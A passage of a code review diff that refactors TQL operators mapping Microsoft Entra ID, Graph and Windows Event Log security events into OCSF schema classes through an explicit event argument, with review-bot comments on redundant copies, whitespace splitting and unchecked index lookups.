+$event.ocsf.end_time = time(move $event.graph.lastUpdatedDateTime?) let $risk_levels = { none: 1, @@ -27,10 +32,10 @@ let $risk_level_ids = { medium: 2, high: 3, } -ocsf.severity_id = $risk_levels[graph.riskLevel]? else 0 -ocsf.risk_level_id = $risk_level_ids[graph.riskLevel]? -if ocsf.risk_level_id != null { - drop graph.riskLevel? +$event.ocsf.severity_id = $risk_levels[$event.graph.riskLevel]? else 0 +$event.ocsf.risk_level_id = $risk_level_ids[$event.graph.riskLevel]? +if $event.ocsf.risk_level_id != null { + drop $event.graph.riskLevel? } let $statuses = { 
@@ -41,48 +46,48 @@ let $statuses = { remediated: 4, dismissed: 3, } -ocsf.status_id = $statuses[graph.riskState]? -if ocsf.status_id != null { - drop graph.riskState? +$event.ocsf.status_id = $statuses[$event.graph.riskState]? +if $event.ocsf.status_id != null { + drop $event.graph.riskState? } -ocsf.finding_info = { - uid: ocsf.metadata.original_event_uid, - title: move graph.riskEventType?, - desc: move graph.riskDetail?, +$event.ocsf.finding_info = { + uid: $event.ocsf.metadata.original_event_uid, + title: move $event.graph.riskEventType?, + desc: move $event.graph.riskDetail?, product: { - name: move graph.source?, + name: move $event.graph.source?, vendor_name: "Microsoft", }, } -ocsf.evidences = [{ +$event.ocsf.evidences = [{ actor: { user: { - uid: move graph.userId?, - name: graph.userPrincipalName?.split("@")[0]?, - domain: graph.userPrincipalName?.split("@")[1]?, - email_addr: move graph.userPrincipalName?, - full_name: move graph.userDisplayName?, + uid: move $event.graph.userId?, + name: $event.graph.userPrincipalName?.split("@")[0]?, + domain: $event.graph.userPrincipalName?.split("@")[1]?, + email_addr: move $event.graph.userPrincipalName?, + full_name: move $event.graph.userDisplayName?, type_id: 1, }, }, src_endpoint: { - ip: move graph.ipAddress?, + ip: move $event.graph.ipAddress?, location: { - city: move graph.location.city?, - country: move graph.location.countryOrRegion?, + city: move $event.graph.location.city?, + country: move $event.graph.location.countryOrRegion?, }, }, }] -drop graph.location? +drop $event.graph.location? -ocsf.resources = [{ - name: ocsf.evidences[0].actor.user.email_addr, - uid: ocsf.evidences[0].actor.user.uid, +$event.ocsf.resources = [{ + name: $event.ocsf.evidences[0].actor.user.email_addr, + uid: $event.ocsf.evidences[0].actor.user.uid, type: "User", role_id: 3, }] -ocsf.is_alert = true +$event.ocsf.is_alert = true 
diff --git a/microsoft/operators/graph/ocsf/events/risky_user.tql b/microsoft/operators/graph/ocsf/events/risky_user.tql index 7b2db9a..aa68acc 100644 --- a/microsoft/operators/graph/ocsf/events/risky_user.tql +++ b/microsoft/operators/graph/ocsf/events/risky_user.tql @@ -1,18 +1,23 @@ --- description: Microsoft Entra ID risky user → OCSF Detection Finding (2004) +args: + named: + - name: event + description: The working event to map. + type: field --- @name = "ocsf.detection_finding" -ocsf.metadata.product.name = "Microsoft Entra ID Protection" -ocsf.metadata.log_name = "identityProtection/riskyUsers" -ocsf.metadata.profiles = ["cloud", "security_control"] +$event.ocsf.metadata.product.name = "Microsoft Entra ID Protection" +$event.ocsf.metadata.log_name = "identityProtection/riskyUsers" +$event.ocsf.metadata.profiles = ["cloud", "security_control"] -ocsf.category_uid = 2 -ocsf.class_uid = 2004 -ocsf.activity_id = 1 // Create -ocsf.type_uid = ocsf.class_uid * 100 + ocsf.activity_id -ocsf.time = time(move graph.riskLastUpdatedDateTime) +$event.ocsf.category_uid = 2 +$event.ocsf.class_uid = 2004 +$event.ocsf.activity_id = 1 // Create +$event.ocsf.type_uid = $event.ocsf.class_uid * 100 + $event.ocsf.activity_id +$event.ocsf.time = time(move $event.graph.riskLastUpdatedDateTime) let $risk_levels = { none: 1, @@ -26,10 +31,10 @@ let $risk_level_ids = { medium: 2, high: 3, } -ocsf.severity_id = $risk_levels[graph.riskLevel]? else 0 -ocsf.risk_level_id = $risk_level_ids[graph.riskLevel]? -if ocsf.risk_level_id != null { - drop graph.riskLevel? +$event.ocsf.severity_id = $risk_levels[$event.graph.riskLevel]? else 0 +$event.ocsf.risk_level_id = $risk_level_ids[$event.graph.riskLevel]? +if $event.ocsf.risk_level_id != null { + drop $event.graph.riskLevel? } let $statuses = { 
@@ -40,26 +45,26 @@ let $statuses = { remediated: 4, dismissed: 3, } -ocsf.status_id = $statuses[graph.riskState]? -if ocsf.status_id != null { - drop graph.riskState? +$event.ocsf.status_id = $statuses[$event.graph.riskState]? +if $event.ocsf.status_id != null { + drop $event.graph.riskState? } -ocsf.finding_info = { - uid: ocsf.metadata.original_event_uid, +$event.ocsf.finding_info = { + uid: $event.ocsf.metadata.original_event_uid, title: "Risky user", - desc: move graph.riskDetail?, + desc: move $event.graph.riskDetail?, } -ocsf.resources = [{ - uid: ocsf.finding_info.uid, - name: move graph.userPrincipalName?, +$event.ocsf.resources = [{ + uid: $event.ocsf.finding_info.uid, + name: move $event.graph.userPrincipalName?, type: "User", role_id: 3, owner: { - full_name: move graph.userDisplayName?, + full_name: move $event.graph.userDisplayName?, type_id: 1, }, }] -ocsf.is_alert = true +$event.ocsf.is_alert = true diff --git a/microsoft/operators/graph/ocsf/events/sign_in.tql b/microsoft/operators/graph/ocsf/events/sign_in.tql index 613ec64..aacb111 100644 --- a/microsoft/operators/graph/ocsf/events/sign_in.tql +++ b/microsoft/operators/graph/ocsf/events/sign_in.tql 
@@ -1,128 +1,133 @@ --- description: Microsoft Entra ID sign-in log → OCSF Authentication (3002) +args: + named: + - name: event + description: The working event to map. + type: field --- @name = "ocsf.authentication" -ocsf.metadata.product.name = "Microsoft Entra ID" -ocsf.metadata.log_name = "auditLogs/signIns" -ocsf.metadata.profiles = ["cloud", "security_control"] +$event.ocsf.metadata.product.name = "Microsoft Entra ID" +$event.ocsf.metadata.log_name = "auditLogs/signIns" +$event.ocsf.metadata.profiles = ["cloud", "security_control"] -ocsf.category_uid = 3 -ocsf.class_uid = 3002 -ocsf.activity_id = 1 // Logon -ocsf.type_uid = ocsf.class_uid * 100 + ocsf.activity_id +$event.ocsf.category_uid = 3 +$event.ocsf.class_uid = 3002 +$event.ocsf.activity_id = 1 // Logon +$event.ocsf.type_uid = $event.ocsf.class_uid * 100 + $event.ocsf.activity_id -ocsf.time = time(move graph.createdDateTime) +$event.ocsf.time = time(move $event.graph.createdDateTime) -ocsf.user = { - uid: move graph.userId?, - name: graph.userPrincipalName?.split("@")[0]?, - domain: graph.userPrincipalName?.split("@")[1]?, - email_addr: move graph.userPrincipalName?, - full_name: move graph.userDisplayName?, +$event.ocsf.user = { + uid: move $event.graph.userId?, + name: $event.graph.userPrincipalName?.split("@")[0]?, + domain: $event.graph.userPrincipalName?.split("@")[1]?, + email_addr: move $event.graph.userPrincipalName?, + full_name: move $event.graph.userDisplayName?, type_id: 1, } -ocsf.actor = { - user: ocsf.user, +$event.ocsf.actor = { + user: $event.ocsf.user, } -ocsf.service = { - uid: move graph.appId?, - name: move graph.appDisplayName?, +$event.ocsf.service = { + uid: move $event.graph.appId?, + name: move $event.graph.appDisplayName?, } -ocsf.dst_endpoint = { - uid: move graph.resourceId?, - svc_name: move graph.resourceDisplayName?, +$event.ocsf.dst_endpoint = { + uid: move $event.graph.resourceId?, + svc_name: move $event.graph.resourceDisplayName?, } -ocsf.src_endpoint = { - ip: move 
graph.ipAddress?, +$event.ocsf.src_endpoint = { + ip: move $event.graph.ipAddress?, location: { - city: move graph.location.city?, - country: move graph.location.countryOrRegion?, + city: move $event.graph.location.city?, + country: move $event.graph.location.countryOrRegion?, }, os: { - name: move graph.deviceDetail.operatingSystem?, + name: move $event.graph.deviceDetail.operatingSystem?, }, - uid: move graph.deviceDetail.deviceId?, + uid: move $event.graph.deviceDetail.deviceId?, } let $status_ids = { "0": 1, } -ocsf.status_id = $status_ids[graph.status.errorCode.string()]? else 2 -if ocsf.status_id == 2 { - ocsf.severity_id = 2 +$event.ocsf.status_id = $status_ids[$event.graph.status.errorCode.string()]? else 2 +if $event.ocsf.status_id == 2 { + $event.ocsf.severity_id = 2 } -ocsf.status_code = (move graph.status.errorCode).string() -ocsf.status_detail = move graph.status.failureReason? -drop graph.status? -drop graph.location? -drop graph.deviceDetail? +$event.ocsf.status_code = (move $event.graph.status.errorCode).string() +$event.ocsf.status_detail = move $event.graph.status.failureReason? +drop $event.graph.status? +drop $event.graph.location? +drop $event.graph.deviceDetail? -ocsf.is_mfa = graph.mfaDetail? != null -if graph.mfaDetail.authMethod? != null { - graph._auth_factor_type = graph.mfaDetail.authMethod - match graph._auth_factor_type.to_lower() { +$event.ocsf.is_mfa = $event.graph.mfaDetail? != null +if $event.graph.mfaDetail.authMethod? 
!= null { + $event.graph._auth_factor_type = $event.graph.mfaDetail.authMethod + match $event.graph._auth_factor_type.to_lower() { "sms" => { - graph._auth_factor_type_id = 1 - graph._auth_factor_type = "SMS" + $event.graph._auth_factor_type_id = 1 + $event.graph._auth_factor_type = "SMS" } "phone" | "phone call" | "voice" | "voicemail" => { - graph._auth_factor_type_id = 3 - graph._auth_factor_type = "Phone Call" + $event.graph._auth_factor_type_id = 3 + $event.graph._auth_factor_type = "Phone Call" } "push" | "push notification" | "authenticator app" => { - graph._auth_factor_type_id = 5 - graph._auth_factor_type = "Push Notification" + $event.graph._auth_factor_type_id = 5 + $event.graph._auth_factor_type = "Push Notification" } "oath" | "software oath token" | "otp" => { - graph._auth_factor_type_id = 7 - graph._auth_factor_type = "OTP" + $event.graph._auth_factor_type_id = 7 + $event.graph._auth_factor_type = "OTP" } "email" => { - graph._auth_factor_type_id = 8 - graph._auth_factor_type = "Email" + $event.graph._auth_factor_type_id = 8 + $event.graph._auth_factor_type = "Email" } _ => { - graph._auth_factor_type_id = 99 + $event.graph._auth_factor_type_id = 99 } } - ocsf.auth_factors = [{ - factor_type: move graph._auth_factor_type, - factor_type_id: move graph._auth_factor_type_id, + $event.ocsf.auth_factors = [{ + factor_type: move $event.graph._auth_factor_type, + factor_type_id: move $event.graph._auth_factor_type_id, }] - drop graph.mfaDetail.authMethod? + drop $event.graph.mfaDetail.authMethod? } -if graph.mfaDetail.authDetail? == null { - drop graph.mfaDetail? +if $event.graph.mfaDetail.authDetail? == null { + drop $event.graph.mfaDetail? 
} -match graph.conditionalAccessStatus { +match $event.graph.conditionalAccessStatus { "success" => { - ocsf.action_id = 1 - ocsf.disposition_id = 1 - drop graph.conditionalAccessStatus + $event.ocsf.action_id = 1 + $event.ocsf.disposition_id = 1 + drop $event.graph.conditionalAccessStatus } "failure" => { - ocsf.action_id = 2 - ocsf.disposition_id = 26 - drop graph.conditionalAccessStatus + $event.ocsf.action_id = 2 + $event.ocsf.disposition_id = 26 + drop $event.graph.conditionalAccessStatus } "notApplied" => { - ocsf.action_id = 3 - ocsf.disposition_id = 16 - drop graph.conditionalAccessStatus + $event.ocsf.action_id = 3 + $event.ocsf.disposition_id = 16 + drop $event.graph.conditionalAccessStatus } _ => {} } -ocsf.is_remote = true +$event.ocsf.is_remote = true -if graph.isInteractive? != null { - ocsf.logon_type_id = 99 - ocsf.logon_type = "interactiveUser" if graph.isInteractive else "nonInteractiveUser" - drop graph.isInteractive +if $event.graph.isInteractive? != null { + $event.ocsf.logon_type_id = 99 + $event.ocsf.logon_type = "interactiveUser" if $event.graph.isInteractive else "nonInteractiveUser" + drop $event.graph.isInteractive } diff --git a/microsoft/operators/graph/ocsf/map.tql b/microsoft/operators/graph/ocsf/map.tql index 58e34e7..1d78335 100644 --- a/microsoft/operators/graph/ocsf/map.tql +++ b/microsoft/operators/graph/ocsf/map.tql @@ -7,14 +7,13 @@ args: type: field --- -graph = $event -ocsf = {} +$event = {...$event, graph: $event, ocsf: {}} -ocsf.cloud = { +$event.ocsf.cloud = { provider: "Azure", } -ocsf.metadata = { +$event.ocsf.metadata = { product: { vendor_name: "Microsoft", feature: { 
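Review bot: `$event = {...$event, graph: $event, ocsf: {}}` spreads every original field into the top level of the working record next to the `graph` copy, but none of the sub-operators dispatched below read anything except `$event.graph`, `$event.ocsf` and `@name`, and the closing `$event = {...$event.ocsf, unmapped: $event.graph}` in the next hunk discards the top-level duplicates unread. Unless a sub-operator outside this diff depends on them, `$event = {graph: $event, ocsf: {}}` expresses the same intent without carrying two copies of the source event through the whole mapping. If the spread is deliberate, a comment saying why would help, since the old `graph = $event` made the single-copy intent obvious.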
@@ -24,49 +23,49 @@ ocsf.metadata = { profiles: ["cloud"], version: "1.8.0", } -if graph.tenantId? != null { - ocsf.metadata.tenant_uid = move graph.tenantId +if $event.graph.tenantId? != null { + $event.ocsf.metadata.tenant_uid = move $event.graph.tenantId } -if graph.correlationId? != null { - ocsf.metadata.correlation_uid = move graph.correlationId +if $event.graph.correlationId? != null { + $event.ocsf.metadata.correlation_uid = move $event.graph.correlationId } -if graph.id? != null { - ocsf.metadata.original_event_uid = move graph.id +if $event.graph.id? != null { + $event.ocsf.metadata.original_event_uid = move $event.graph.id } -ocsf.severity_id = 1 +$event.ocsf.severity_id = 1 match @name { "microsoft.graph.sign_in" => { - microsoft::graph::ocsf::events::sign_in + microsoft::graph::ocsf::events::sign_in event=$event } "microsoft.graph.directory_audit" => { - microsoft::graph::ocsf::events::directory_audit + microsoft::graph::ocsf::events::directory_audit event=$event } "microsoft.graph.defender.alert" => { - microsoft::graph::ocsf::events::defender_alert + microsoft::graph::ocsf::events::defender_alert event=$event } "microsoft.graph.defender.incident" => { - microsoft::graph::ocsf::events::defender_incident + microsoft::graph::ocsf::events::defender_incident event=$event } "microsoft.graph.identity_protection.risk_detection" => { - microsoft::graph::ocsf::events::risk_detection + microsoft::graph::ocsf::events::risk_detection event=$event } "microsoft.graph.identity_protection.risky_user" => { - microsoft::graph::ocsf::events::risky_user + microsoft::graph::ocsf::events::risky_user event=$event } "microsoft.graph.intune.managed_device" => { - microsoft::graph::ocsf::events::managed_device + microsoft::graph::ocsf::events::managed_device event=$event } "microsoft.graph.intune.detected_app" => { - microsoft::graph::ocsf::events::detected_app + microsoft::graph::ocsf::events::detected_app event=$event } 
"microsoft.graph.intune.compliance_policy_setting_state_summary" => { - microsoft::graph::ocsf::events::compliance_policy_setting_state_summary + microsoft::graph::ocsf::events::compliance_policy_setting_state_summary event=$event } _ => { - microsoft::graph::ocsf::base + microsoft::graph::ocsf::base event=$event } } -$event = {...move ocsf, unmapped: move graph} +$event = {...$event.ocsf, unmapped: $event.graph} diff --git a/microsoft/operators/windows/ocsf/base.tql b/microsoft/operators/windows/ocsf/base.tql index a799938..143e5d0 100644 --- a/microsoft/operators/windows/ocsf/base.tql +++ b/microsoft/operators/windows/ocsf/base.tql @@ -1,10 +1,15 @@ --- description: Microsoft Windows Event Log → OCSF Base Event (0) +args: + named: + - name: event + description: The working event to map. + type: field --- @name = "ocsf.base_event" -ocsf.category_uid = 0 -ocsf.class_uid = 0 -ocsf.activity_id = 0 -ocsf.type_uid = 0 +$event.ocsf.category_uid = 0 +$event.ocsf.class_uid = 0 +$event.ocsf.activity_id = 0 +$event.ocsf.type_uid = 0 diff --git a/microsoft/operators/windows/ocsf/events/account_change.tql b/microsoft/operators/windows/ocsf/events/account_change.tql index ba4dea9..cdc694e 100644 --- a/microsoft/operators/windows/ocsf/events/account_change.tql +++ b/microsoft/operators/windows/ocsf/events/account_change.tql @@ -3,12 +3,17 @@ description: > Account Change (EID 4720/4722–4726) → OCSF Account Change (3001) 4720 Create, 4722 Enable, 4723 Password Change, 4724 Password Reset, 4725 Disable, 4726 Delete +args: + named: + - name: event + description: The working event to map. + type: field --- @name = "ocsf.account_change" -ocsf.category_uid = 3 -ocsf.class_uid = 3001 +$event.ocsf.category_uid = 3 +$event.ocsf.class_uid = 3001 let $activities = { "4720": 1, // Create 
@@ -18,24 +23,24 @@ let $activities = { "4725": 5, // Disable "4726": 6, // Delete } -ocsf.activity_id = $activities[ocsf.metadata.event_code]? else 99 -ocsf.type_uid = ocsf.class_uid * 100 + ocsf.activity_id +$event.ocsf.activity_id = $activities[$event.ocsf.metadata.event_code]? else 99 +$event.ocsf.type_uid = $event.ocsf.class_uid * 100 + $event.ocsf.activity_id -ocsf.actor = { +$event.ocsf.actor = { user: { - uid: move windows.EventData.SubjectUserSid, - name: move windows.EventData.SubjectUserName, - domain: move windows.EventData.SubjectDomainName, + uid: move $event.windows.EventData.SubjectUserSid, + name: move $event.windows.EventData.SubjectUserName, + domain: move $event.windows.EventData.SubjectDomainName, }, session: { - uid_alt: move windows.EventData.SubjectLogonId, + uid_alt: move $event.windows.EventData.SubjectLogonId, }, } -ocsf.user = { - uid: move windows.EventData.TargetSid, - name: move windows.EventData.TargetUserName, - domain: move windows.EventData.TargetDomainName, +$event.ocsf.user = { + uid: move $event.windows.EventData.TargetSid, + name: move $event.windows.EventData.TargetUserName, + domain: move $event.windows.EventData.TargetDomainName, } // EID 4720 carries many account-attribute fields (DisplayName, HomeDirectory, diff --git a/microsoft/operators/windows/ocsf/events/application_crash_report.tql b/microsoft/operators/windows/ocsf/events/application_crash_report.tql index 47e04f3..5287a13 100644 --- a/microsoft/operators/windows/ocsf/events/application_crash_report.tql +++ b/microsoft/operators/windows/ocsf/events/application_crash_report.tql 
@@ -1,32 +1,37 @@ --- description: Windows Error Reporting (EID 1001) → OCSF Process Activity (1007, Terminate) +args: + named: + - name: event + description: The working event to map. + type: field --- @name = "ocsf.process_activity" -ocsf.category_uid = 1 -ocsf.class_uid = 1007 -ocsf.activity_id = 2 // Terminate -ocsf.type_uid = ocsf.class_uid * 100 + ocsf.activity_id +$event.ocsf.category_uid = 1 +$event.ocsf.class_uid = 1007 +$event.ocsf.activity_id = 2 // Terminate +$event.ocsf.type_uid = $event.ocsf.class_uid * 100 + $event.ocsf.activity_id // WER fires after a crash has been recorded; the process has already exited. -ocsf.status_id = 2 // Failure -ocsf.severity_id = 3 // Medium — Windows Event Log Level 2 (Error) -ocsf.status_code = move windows.EventData.param9 // exception code (e.g. c0000005) +$event.ocsf.status_id = 2 // Failure +$event.ocsf.severity_id = 3 // Medium — Windows Event Log Level 2 (Error) +$event.ocsf.status_code = move $event.windows.EventData.param9 // exception code (e.g. c0000005) // param5 = faulting application name (short name, e.g. "payload.exe") // param6 = faulting application version // param12 = full path to the faulting application -ocsf.process = { - path: move windows.EventData.param12, +$event.ocsf.process = { + path: move $event.windows.EventData.param12, file: { type_id: 8, // Executable File - version: (move windows.EventData.param6).string(), + version: (move $event.windows.EventData.param6).string(), }, } -ocsf.process.name = ocsf.process.path.split("\\")[-1] -ocsf.process.file.name = ocsf.process.name -ocsf.process.file.path = ocsf.process.path +$event.ocsf.process.name = $event.ocsf.process.path.split("\\")[-1] +$event.ocsf.process.file.name = $event.ocsf.process.name +$event.ocsf.process.file.path = $event.ocsf.process.path // param5 = app name (redundant with process.name — dropped) 
@@ -34,4 +39,4 @@ ocsf.process.file.path = ocsf.process.path // param8 = faulting module version | left in unmapped // param10 = exception offset / // param1, param2, param3, param4, param11 = WER IDs, fault type, cab, report GUID — unmapped -drop windows.EventData.param5 +drop $event.windows.EventData.param5 diff --git a/microsoft/operators/windows/ocsf/events/application_error.tql b/microsoft/operators/windows/ocsf/events/application_error.tql index b003e48..e3f7c3e 100644 --- a/microsoft/operators/windows/ocsf/events/application_error.tql +++ b/microsoft/operators/windows/ocsf/events/application_error.tql 
@@ -1,36 +1,41 @@ --- description: Application Error (EID 1000) → OCSF Process Activity (1007, Terminate) +args: + named: + - name: event + description: The working event to map. + type: field --- @name = "ocsf.process_activity" -ocsf.category_uid = 1 -ocsf.class_uid = 1007 -ocsf.activity_id = 2 // Terminate -ocsf.type_uid = ocsf.class_uid * 100 + ocsf.activity_id +$event.ocsf.category_uid = 1 +$event.ocsf.class_uid = 1007 +$event.ocsf.activity_id = 2 // Terminate +$event.ocsf.type_uid = $event.ocsf.class_uid * 100 + $event.ocsf.activity_id -ocsf.status_id = 2 // Failure -ocsf.severity_id = 3 // Medium — Windows Event Log Level 2 (Error) -ocsf.status_code = move windows.EventData.param7 // exception code (e.g. c0000005 = access violation) +$event.ocsf.status_id = 2 // Failure +$event.ocsf.severity_id = 3 // Medium — Windows Event Log Level 2 (Error) +$event.ocsf.status_code = move $event.windows.EventData.param7 // exception code (e.g. c0000005 = access violation) // param9 = faulting process ID (hex string, e.g. 
"0x1a4c") // param11 = full path to the faulting application // param2 = faulting application version -ocsf.process = { - pid: int(move windows.EventData.param9, base=16), - path: move windows.EventData.param11, +$event.ocsf.process = { + pid: int(move $event.windows.EventData.param9, base=16), + path: move $event.windows.EventData.param11, file: { type_id: 8, // Executable File - version: (move windows.EventData.param2).string(), + version: (move $event.windows.EventData.param2).string(), }, } -ocsf.process.name = ocsf.process.path.split("\\")[-1] -ocsf.process.file.name = ocsf.process.name -ocsf.process.file.path = ocsf.process.path +$event.ocsf.process.name = $event.ocsf.process.path.split("\\")[-1] +$event.ocsf.process.file.name = $event.ocsf.process.name +$event.ocsf.process.file.path = $event.ocsf.process.path // param1 = faulting application name (redundant with process.name — dropped) // param4 = faulting module name \ // param5 = faulting module version | left in unmapped; no OCSF module object // param12 = faulting module path / // param3, param6, param8, param10, param13 = timestamps, offset, report ID — unmapped -drop windows.EventData.param1 +drop $event.windows.EventData.param1 diff --git a/microsoft/operators/windows/ocsf/events/application_hang.tql b/microsoft/operators/windows/ocsf/events/application_hang.tql index b9f42c8..f0b408b 100644 --- a/microsoft/operators/windows/ocsf/events/application_hang.tql +++ b/microsoft/operators/windows/ocsf/events/application_hang.tql 
@@ -1,31 +1,36 @@ --- description: Application Hang (EID 1002) → OCSF Process Activity (1007, Terminate) +args: + named: + - name: event + description: The working event to map. + type: field --- @name = "ocsf.process_activity" -ocsf.category_uid = 1 -ocsf.class_uid = 1007 -ocsf.activity_id = 2 // Terminate -ocsf.type_uid = ocsf.class_uid * 100 + ocsf.activity_id +$event.ocsf.category_uid = 1 +$event.ocsf.class_uid = 1007 +$event.ocsf.activity_id = 2 // Terminate +$event.ocsf.type_uid = $event.ocsf.class_uid * 100 + $event.ocsf.activity_id -ocsf.status_id = 2 // Failure -ocsf.severity_id = 3 // Medium — Windows Event Log Level 2 (Error) +$event.ocsf.status_id = 2 // Failure +$event.ocsf.severity_id = 3 // Medium — Windows Event Log Level 2 (Error) // param4 = faulting process ID (hex string, e.g. "0x1a4c") // param9 = full path to the hanging application // param2 = hanging application version -ocsf.process = { - pid: int(move windows.EventData.param4, base=16), - path: move windows.EventData.param9, +$event.ocsf.process = { + pid: int(move $event.windows.EventData.param4, base=16), + path: move $event.windows.EventData.param9, file: { type_id: 8, // Executable File - version: (move windows.EventData.param2).string(), + version: (move $event.windows.EventData.param2).string(), }, } -ocsf.process.name = ocsf.process.path.split("\\")[-1] -ocsf.process.file.name = ocsf.process.name -ocsf.process.file.path = ocsf.process.path +$event.ocsf.process.name = $event.ocsf.process.path.split("\\")[-1] +$event.ocsf.process.file.name = $event.ocsf.process.name +$event.ocsf.process.file.path = $event.ocsf.process.path // param1 = application name (redundant with process.name — dropped) // param3 = application timestamp \ @@ -33,4 +38,4 @@ ocsf.process.file.path = ocsf.process.path // param6 = hang duration (ms) | // param7 = hang flags | // param8 = WER report ID / -drop windows.EventData.param1 +drop $event.windows.EventData.param1 
diff --git a/microsoft/operators/windows/ocsf/events/authorize_session.tql b/microsoft/operators/windows/ocsf/events/authorize_session.tql index 823ec7a..a711b11 100644 --- a/microsoft/operators/windows/ocsf/events/authorize_session.tql +++ b/microsoft/operators/windows/ocsf/events/authorize_session.tql @@ -1,22 +1,27 @@ --- description: Special Privileges Assigned to New Logon (EID 4672) → OCSF Authorize Session (3003, Assign Privileges) +args: + named: + - name: event + description: The working event to map. + type: field --- @name = "ocsf.authorize_session" -ocsf.category_uid = 3 -ocsf.class_uid = 3003 -ocsf.activity_id = 1 // Assign Privileges -ocsf.type_uid = ocsf.class_uid * 100 + ocsf.activity_id +$event.ocsf.category_uid = 3 +$event.ocsf.class_uid = 3003 +$event.ocsf.activity_id = 1 // Assign Privileges +$event.ocsf.type_uid = $event.ocsf.class_uid * 100 + $event.ocsf.activity_id -ocsf.user = { - uid: move windows.EventData.SubjectUserSid, - name: move windows.EventData.SubjectUserName, - domain: move windows.EventData.SubjectDomainName, +$event.ocsf.user = { + uid: move $event.windows.EventData.SubjectUserSid, + name: move $event.windows.EventData.SubjectUserName, + domain: move $event.windows.EventData.SubjectDomainName, } -ocsf.session = { - uid_alt: move windows.EventData.SubjectLogonId, +$event.ocsf.session = { + uid_alt: move $event.windows.EventData.SubjectLogonId, } -ocsf.privileges = (move windows.EventData.PrivilegeList).split_regex(r"\s+") +$event.ocsf.privileges = (move $event.windows.EventData.PrivilegeList).split_regex(r"\s+") diff --git a/microsoft/operators/windows/ocsf/events/defender_asr.tql b/microsoft/operators/windows/ocsf/events/defender_asr.tql index 3b62940..defb673 100644 --- a/microsoft/operators/windows/ocsf/events/defender_asr.tql +++ b/microsoft/operators/windows/ocsf/events/defender_asr.tql 
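Review bot: `(move $event.windows.EventData.PrivilegeList).split_regex(r"\s+")` yields empty strings at the head or tail whenever the field carries leading or trailing whitespace, which the rendered XML of EID 4672 commonly does (the list is tab- and newline-indented), so `ocsf.privileges` can contain `""` entries. Trimming before the split, `.trim().split_regex(r"\s+")`, avoids that; this is pre-existing behaviour, but the rewrite of the line is the natural place to settle it.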
@@ -2,55 +2,60 @@ description: > Windows Defender Attack Surface Reduction Block (EID 1121) → OCSF Detection Finding (2004) +args: + named: + - name: event + description: The working event to map. + type: field --- @name = "ocsf.detection_finding" -ocsf.category_uid = 2 -ocsf.class_uid = 2004 -ocsf.activity_id = 1 // Create -ocsf.type_uid = ocsf.class_uid * 100 + ocsf.activity_id -ocsf.metadata.profiles = ["host", "security_control"] +$event.ocsf.category_uid = 2 +$event.ocsf.class_uid = 2004 +$event.ocsf.activity_id = 1 // Create +$event.ocsf.type_uid = $event.ocsf.class_uid * 100 + $event.ocsf.activity_id +$event.ocsf.metadata.profiles = ["host", "security_control"] // ASR blocks are always high-severity actionable events. -ocsf.severity_id = 4 // High -ocsf.disposition_id = 2 // Blocked +$event.ocsf.severity_id = 4 // High +$event.ocsf.disposition_id = 2 // Blocked -ocsf.finding_info = { - title: windows.EventData["Threat Name"], - uid: move windows.EventData["Rule ID"], - desc: move windows.EventData["Rule Name"], +$event.ocsf.finding_info = { + title: $event.windows.EventData["Threat Name"], + uid: move $event.windows.EventData["Rule ID"], + desc: move $event.windows.EventData["Rule Name"], types: ["ASR Rule Block"], } -ocsf.malware = [{ - name: move windows.EventData["Threat Name"], +$event.ocsf.malware = [{ + name: move $event.windows.EventData["Threat Name"], }] // Process that was blocked. 
-ocsf.actor = { +$event.ocsf.actor = { process: { - path: move windows.EventData["Process name"], + path: move $event.windows.EventData["Process name"], file: { type_id: 1 }, }, } -ocsf.actor.process.name = ocsf.actor.process.path.split("\\")[-1] -ocsf.actor.process.file.name = ocsf.actor.process.name -ocsf.actor.process.file.path = ocsf.actor.process.path +$event.ocsf.actor.process.name = $event.ocsf.actor.process.path.split("\\")[-1] +$event.ocsf.actor.process.file.name = $event.ocsf.actor.process.name +$event.ocsf.actor.process.file.path = $event.ocsf.actor.process.path // User is "DOMAIN\username" format. -_user = (move windows.EventData.User).split("\\") -ocsf.actor.user = { +_user = (move $event.windows.EventData.User).split("\\") +$event.ocsf.actor.user = { domain: _user[0], name: _user[1], } drop _user // Affected file with hashes; wrap in evidences as required by Detection Finding. -ocsf.file = { - path: move windows.EventData.Path, +$event.ocsf.file = { + path: move $event.windows.EventData.Path, type_id: 1, } -ocsf.file.name = ocsf.file.path.split("\\")[-1] +$event.ocsf.file.name = $event.ocsf.file.path.split("\\")[-1] // Parse "SHA256=" or "MD5=,SHA256=,..." into hash objects. let $algorithms = { @@ -59,11 +64,11 @@ let $algorithms = { SHA256: 3, SHA512: 4, } -ocsf.file.hashes = ((move windows.EventData.Hashes) +$event.ocsf.file.hashes = ((move $event.windows.EventData.Hashes) .split(",") .map(h => h.split("=", max=1)) .map(kv => { algorithm_id: $algorithms[kv[0]?]? else 99, value: kv[1]?, })) -ocsf.evidences = [{ file: move ocsf.file }] +$event.ocsf.evidences = [{ file: move $event.ocsf.file }] diff --git a/microsoft/operators/windows/ocsf/events/defender_detection.tql b/microsoft/operators/windows/ocsf/events/defender_detection.tql index 3e95141..b89fa69 100644 --- a/microsoft/operators/windows/ocsf/events/defender_detection.tql +++ b/microsoft/operators/windows/ocsf/events/defender_detection.tql 
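Review bot: `name: _user[1]` in the actor.user mapping has no `?`, unlike `kv[1]?` in the hashes parse a few lines below, so a User value without a backslash (a bare account name, presumably possible) makes the outcome depend on how an out-of-range index is treated rather than on an explicit null; `name: _user[1]?` keeps the two lookups consistent. The same applies to the Detection User split in defender_detection.tql and the User split in defender_threat.tql. Separately, the scratch field is still written as top-level `_user` while everything else now lives under `$event`; that is harmless when the operator is called with `event=this`, but if `$event` is a nested field the temporary lands (and is dropped) outside it, which deserves a comment such as `// scratch field on the top-level event, dropped below` — the same holds for `_parts` in kerberos_service_ticket.tql.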
